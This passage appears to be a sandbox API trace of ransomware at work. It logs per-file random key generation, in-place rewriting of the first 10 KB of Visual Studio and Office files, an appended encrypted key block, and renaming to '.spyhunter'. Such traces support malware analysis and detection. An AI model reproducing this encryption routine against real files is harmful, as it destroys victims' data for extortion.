dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0165.692] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\ResourceInternal.zip") returned 116 [0165.692] StrStrW (lpFirst="ResourceInternal.zip", lpSrch=".txt") returned 0x0 [0165.692] GetProcessHeap () returned 0x2c0000 [0165.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0165.692] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e6b4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e6b4*=0x85a, lpOverlapped=0x0) returned 1 [0165.706] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffff7a6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.706] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x85a, lpNumberOfBytesWritten=0x270e6b4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e6b4*=0x85a, lpOverlapped=0x0) returned 1 [0165.706] GetProcessHeap () returned 0x2c0000 [0165.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0165.706] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.706] WriteFile (in: hFile=0x9c, lpBuffer=0x270e6f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e6b4, lpOverlapped=0x0 | out: lpBuffer=0x270e6f4*, lpNumberOfBytesWritten=0x270e6b4*=0x4, lpOverlapped=0x0) returned 1 [0165.706] WriteFile (in: hFile=0x9c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e6b4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e6b4*=0x30, lpOverlapped=0x0) returned 1 [0165.706] CloseHandle (hObject=0x9c) returned 1 [0165.714] GetProcessHeap () returned 0x2c0000 [0165.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0165.714] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\ResourceInternal.zip.spyhunter") returned 126 [0165.715] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\ResourceInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\resourceinternal.zip"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\ResourceInternal.zip.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\resourceinternal.zip.spyhunter")) returned 1 [0165.717] GetProcessHeap () returned 0x2c0000 [0165.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0165.717] GetProcessHeap () returned 0x2c0000 [0165.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0165.717] GetProcessHeap () returned 0x2c0000 [0165.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e87a48 | out: hHeap=0x2c0000) returned 1 [0165.717] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e6f0 | out: pbBuffer=0x270e6f0) returned 1 [0165.717] GetProcessHeap () returned 0x2c0000 [0165.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0165.717] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e6e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e6e8*=0x30) returned 1 [0165.718] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Interface.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\interface.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0165.718] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Interface.zip") returned 109 [0165.718] StrStrW (lpFirst="Interface.zip", lpSrch=".txt") returned 0x0 [0165.718] GetProcessHeap () returned 0x2c0000 [0165.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0165.718] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e6ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e6ac*=0x303, lpOverlapped=0x0) returned 1 [0165.801] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffcfd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.801] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x303, lpNumberOfBytesWritten=0x270e6ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e6ac*=0x303, lpOverlapped=0x0) returned 1 [0165.801] GetProcessHeap () returned 0x2c0000 [0165.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0165.801] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.801] WriteFile (in: hFile=0x9c, lpBuffer=0x270e6ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e6ac, lpOverlapped=0x0 | out: lpBuffer=0x270e6ec*, lpNumberOfBytesWritten=0x270e6ac*=0x4, lpOverlapped=0x0) returned 1 [0165.801] WriteFile (in: hFile=0x9c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e6ac, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e6ac*=0x30, lpOverlapped=0x0) returned 1 [0165.801] CloseHandle (hObject=0x9c) returned 1 [0165.801] GetProcessHeap () returned 0x2c0000 [0165.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0165.802] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Interface.zip.spyhunter") returned 119 [0165.802] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Interface.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\interface.zip"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Interface.zip.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\interface.zip.spyhunter")) returned 1 [0165.803] GetProcessHeap () returned 0x2c0000 [0165.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0165.803] GetProcessHeap () returned 0x2c0000 [0165.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0165.803] GetProcessHeap () returned 0x2c0000 [0165.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee7978 | out: hHeap=0x2c0000) returned 1 [0165.803] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e6f0 | out: pbBuffer=0x270e6f0) returned 1 [0165.803] GetProcessHeap () returned 0x2c0000 [0165.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0165.803] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e6e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e6e8*=0x30) returned 1 [0165.803] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfig.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\appconfig.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0165.804] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfig.zip") returned 109 [0165.804] StrStrW (lpFirst="AppConfig.zip", lpSrch=".txt") returned 0x0 [0165.804] GetProcessHeap () returned 0x2c0000 [0165.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0165.804] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e6ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e6ac*=0x251, lpOverlapped=0x0) returned 1 [0165.829] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffdaf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.829] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x251, lpNumberOfBytesWritten=0x270e6ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e6ac*=0x251, lpOverlapped=0x0) returned 1 [0165.829] GetProcessHeap () returned 0x2c0000 [0165.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0165.829] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.829] WriteFile (in: hFile=0x9c, lpBuffer=0x270e6ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e6ac, lpOverlapped=0x0 | out: lpBuffer=0x270e6ec*, lpNumberOfBytesWritten=0x270e6ac*=0x4, lpOverlapped=0x0) returned 1 [0165.829] WriteFile (in: hFile=0x9c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e6ac, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e6ac*=0x30, lpOverlapped=0x0) returned 1 [0165.829] CloseHandle (hObject=0x9c) returned 1 [0165.829] GetProcessHeap () returned 0x2c0000 [0165.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0165.830] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfig.zip.spyhunter") returned 119 [0165.830] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfig.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\appconfig.zip"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfig.zip.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\appconfig.zip.spyhunter")) returned 1 [0165.830] GetProcessHeap () returned 0x2c0000 [0165.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0165.831] GetProcessHeap () returned 0x2c0000 [0165.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0165.831] GetProcessHeap () returned 0x2c0000 [0165.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee73b0 | out: hHeap=0x2c0000) returned 1 [0165.831] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e6e8 | out: pbBuffer=0x270e6e8) returned 1 [0165.831] GetProcessHeap () returned 0x2c0000 [0165.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0165.831] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e6e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e6e0*=0x30) returned 1 [0165.831] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.DesignTime.dll" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\publicassemblies\\microsoft.visualstudio.tools.applications.designtime.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0165.832] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.DesignTime.dll") returned 138 [0165.832] StrStrW (lpFirst="Microsoft.VisualStudio.Tools.Applications.DesignTime.dll", lpSrch=".txt") returned 0x0 [0165.832] GetProcessHeap () returned 0x2c0000 [0165.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0165.832] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e6a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e6a4*=0x2800, lpOverlapped=0x0) returned 1 [0165.843] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.843] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e6a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e6a4*=0x2800, lpOverlapped=0x0) returned 1 [0165.843] GetProcessHeap () returned 0x2c0000 [0165.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0165.843] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.843] WriteFile (in: hFile=0x9c, lpBuffer=0x270e6e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e6a4, lpOverlapped=0x0 | out: lpBuffer=0x270e6e4*, lpNumberOfBytesWritten=0x270e6a4*=0x4, lpOverlapped=0x0) returned 1 [0165.876] WriteFile (in: hFile=0x9c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e6a4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e6a4*=0x30, lpOverlapped=0x0) returned 1 [0165.876] CloseHandle (hObject=0x9c) returned 1 [0165.876] GetProcessHeap () returned 0x2c0000 [0165.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0165.876] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.DesignTime.dll.spyhunter") returned 148 [0165.876] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.DesignTime.dll" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\publicassemblies\\microsoft.visualstudio.tools.applications.designtime.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.DesignTime.dll.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\publicassemblies\\microsoft.visualstudio.tools.applications.designtime.dll.spyhunter")) returned 1 [0165.877] GetProcessHeap () returned 0x2c0000 [0165.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0165.877] GetProcessHeap () returned 0x2c0000 [0165.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0165.877] GetProcessHeap () returned 0x2c0000 [0165.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e93998 | out: hHeap=0x2c0000) returned 1 [0165.877] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e6e8 | out: pbBuffer=0x270e6e8) returned 1 [0165.877] GetProcessHeap () returned 0x2c0000 [0165.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0165.878] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e6e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e6e0*=0x30) returned 1 [0165.878] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.Adapter.dll" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\publicassemblies\\microsoft.visualstudio.tools.applications.adapter.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0165.879] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.Adapter.dll") returned 135 [0165.879] StrStrW (lpFirst="Microsoft.VisualStudio.Tools.Applications.Adapter.dll", lpSrch=".txt") returned 0x0 [0165.879] GetProcessHeap () returned 0x2c0000 [0165.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0165.879] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e6a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270e6a4*=0x2800, lpOverlapped=0x0) returned 1 [0165.880] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.880] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e6a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270e6a4*=0x2800, lpOverlapped=0x0) returned 1 [0165.881] GetProcessHeap () returned 0x2c0000 [0165.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0165.881] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.881] WriteFile (in: hFile=0x9c, lpBuffer=0x270e6e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e6a4, lpOverlapped=0x0 | out: lpBuffer=0x270e6e4*, lpNumberOfBytesWritten=0x270e6a4*=0x4, lpOverlapped=0x0) returned 1 [0165.894] WriteFile (in: hFile=0x9c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e6a4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e6a4*=0x30, lpOverlapped=0x0) returned 1 [0165.894] CloseHandle (hObject=0x9c) returned 1 [0165.903] GetProcessHeap () returned 0x2c0000 [0165.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0165.903] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.Adapter.dll.spyhunter") returned 145 [0165.903] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.Adapter.dll" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\publicassemblies\\microsoft.visualstudio.tools.applications.adapter.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.Adapter.dll.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\publicassemblies\\microsoft.visualstudio.tools.applications.adapter.dll.spyhunter")) returned 1 [0165.904] GetProcessHeap () returned 0x2c0000 [0165.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0165.904] GetProcessHeap () returned 0x2c0000 [0165.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0165.905] GetProcessHeap () returned 0x2c0000 [0165.905] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e93570 | out: hHeap=0x2c0000) returned 1 [0165.905] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e6e0 | out: pbBuffer=0x270e6e0) returned 1 [0165.905] GetProcessHeap () returned 0x2c0000 [0165.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0165.905] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e6d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e6d8*=0x30) returned 1 [0165.905] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\UMLVC60.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\umlvc60.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0165.906] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\UMLVC60.DLL") returned 64 [0165.906] StrStrW (lpFirst="UMLVC60.DLL", lpSrch=".txt") returned 0x0 [0165.906] GetProcessHeap () returned 0x2c0000 [0165.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0165.906] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e69c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e69c*=0x2800, lpOverlapped=0x0) returned 1 [0165.920] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.920] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e69c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e69c*=0x2800, lpOverlapped=0x0) returned 1 [0165.920] GetProcessHeap () returned 0x2c0000 [0165.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0165.920] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.920] WriteFile (in: hFile=0x9c, lpBuffer=0x270e6dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e69c, lpOverlapped=0x0 | out: lpBuffer=0x270e6dc*, lpNumberOfBytesWritten=0x270e69c*=0x4, lpOverlapped=0x0) returned 1 [0165.937] WriteFile (in: hFile=0x9c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e69c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e69c*=0x30, lpOverlapped=0x0) returned 1 [0165.937] CloseHandle (hObject=0x9c) returned 1 [0165.946] GetProcessHeap () returned 0x2c0000 [0165.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0165.946] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\UMLVC60.DLL.spyhunter") returned 74 [0165.946] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\UMLVC60.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\umlvc60.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\UMLVC60.DLL.spyhunter" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\umlvc60.dll.spyhunter")) returned 1 [0165.947] GetProcessHeap () returned 0x2c0000 [0165.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0165.947] GetProcessHeap () returned 0x2c0000 [0165.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0165.947] GetProcessHeap () returned 0x2c0000 [0165.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e060b8 | out: hHeap=0x2c0000) returned 1 [0165.947] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e6e0 | out: pbBuffer=0x270e6e0) returned 1 [0165.947] GetProcessHeap () returned 0x2c0000 [0165.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0165.947] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e6d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, 